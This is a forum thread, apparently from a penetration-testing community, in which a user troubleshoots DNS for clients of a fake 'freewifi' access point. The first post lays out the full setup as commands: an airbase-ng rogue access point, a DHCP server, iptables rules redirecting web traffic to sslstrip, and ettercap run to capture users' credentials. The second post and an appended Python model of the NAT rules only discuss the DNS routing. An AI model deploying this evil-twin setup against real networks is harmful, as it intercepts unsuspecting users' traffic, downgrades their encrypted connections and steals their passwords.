Thread: fake access point clients can not access internet

  1. #1
    Join Date
    2016-Mar
    Posts
    2

    fake access point clients lacking dns

    With my setup pictured in the attachment there's an issue with the fake wireless access point clients using DNS.
    DNS is routed to the gateway address 192.168.1.1 according to this rule which routes UDP traffic to 192.168.1.1:

    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1

    Is this 192.168.1.1 supposed to be a DNS server/proxy of some sort?
    DNS traffic from the wireless clients in this setup seems to finish at this point.
    In my setup 192.168.1.1 is default gateway/forwarder but not a DNS proxy or router.



    Here's the configuration:

    ############# DHCP INSTALL ##############
    apt-get install isc-dhcp-server

    ####### EDIT /etc/dhcpd.conf #####################
    authoritative;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 192.168.2.0 netmask 255.255.255.0 {
    option routers 192.168.2.1;
    option subnet-mask 255.255.255.0;
    option domain-name "freewifi";
    option domain-name-servers 192.168.1.1;
    range 192.168.2.111 192.168.2.119;
    }

    ############# AIRMON-NG ############
    airmon-ng
    airmon-ng start wlan0
    airbase-ng -c 11 -e freewifi wlan0mon

    ############# AT0 AND IPTABLES #############
    ifconfig at0 192.168.2.1 netmask 255.255.255.0
    ifconfig at0 mtu 1500
    route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
    /etc/init.d/isc-dhcp-server start
    #################SSLSTRIP####################
    sslstrip -f -k -p 10000

    ################# ETTERCAP ##############
    ettercap -p -u -T -q -i at0


    kalipi.jpg
    Last edited by --JayJay--; 2016-03-25 at 13:45.

  2. #2
    Join Date
    2016-Mar
    Posts
    2
    When changing ...

    option domain-name-servers 192.168.1.1;
    to
    option domain-name-servers 8.8.8.8;

    in the DHCP setup, the result is the same, as the next line in iptables is pointing all UDP traffic to 192.168.1.1

    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
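
Added example (not part of either post): a small Python model of the nat PREROUTING chain from post #1, showing where a client's packets are sent after the rules run and which rule has no port or interface match. The packet fields, the sample addresses 192.168.2.111 and 203.0.113.10, the `LOCAL` marker and all function names are assumptions for illustration; it models first-match NAT only, not real netfilter.

```python
import shlex

# Rules copied from the nat PREROUTING chain in post #1, in order.
RULES = [
    "iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1",
    "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000",
]
OPTS = {"-p": "proto", "--dport": "dport", "--destination-port": "dport",
        "-i": "in_if", "--in-interface": "in_if", "-j": "target",
        "--to": "to", "--to-destination": "to", "--to-port": "to"}

def parse_rule(line):
    """Pull the match fields and the target out of one 'iptables -A' line."""
    rule = dict.fromkeys(("proto", "dport", "in_if", "target", "to"))
    tok = shlex.split(line)
    for opt, val in zip(tok, tok[1:]):
        if opt in OPTS:
            rule[OPTS[opt]] = val
    return rule

def unscoped(rule):
    """True for a NAT rule with neither a port nor an interface match."""
    return rule["target"] in ("DNAT", "REDIRECT") and not (rule["dport"] or rule["in_if"])

def prerouting(pkt, rules):
    """Return pkt as it leaves nat PREROUTING; the first matching rule wins."""
    for r in rules:
        if any((r["proto"] and r["proto"] != pkt["proto"],
                r["dport"] and int(r["dport"]) != pkt["dport"],
                r["in_if"] and r["in_if"] != pkt["in_if"])):
            continue
        out = dict(pkt)
        if r["target"] == "DNAT":          # no ":port" in --to keeps the original port
            addr, _, port = r["to"].partition(":")
            out["dst"], out["dport"] = addr, int(port) if port else pkt["dport"]
        elif r["target"] == "REDIRECT":    # delivered to the box itself
            out["dst"], out["dport"] = "LOCAL", int(r["to"])
        return out
    return pkt

PARSED = [parse_rule(r) for r in RULES]

def client(proto, dst, dport):
    """Constructed packet from a DHCP client on at0 (sample values, not captures)."""
    return {"in_if": "at0", "proto": proto, "src": "192.168.2.111", "dst": dst, "dport": dport}

if __name__ == "__main__":
    for p in (client("udp", "8.8.8.8", 53), client("udp", "203.0.113.10", 123),
              client("tcp", "203.0.113.10", 80), client("tcp", "203.0.113.10", 443)):
        out = prerouting(p, PARSED)
        print(f'{p["proto"]} {p["dst"]}:{p["dport"]} -> {out["dst"]}:{out["dport"]}')
    print("unscoped rules:", [r for r, p in zip(RULES, PARSED) if unscoped(p)])
```

In this model a query addressed to 8.8.8.8:53 leaves PREROUTING addressed to 192.168.1.1:53, the same as one sent to 192.168.1.1 directly, and non-DNS UDP such as port 123 is rewritten as well.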
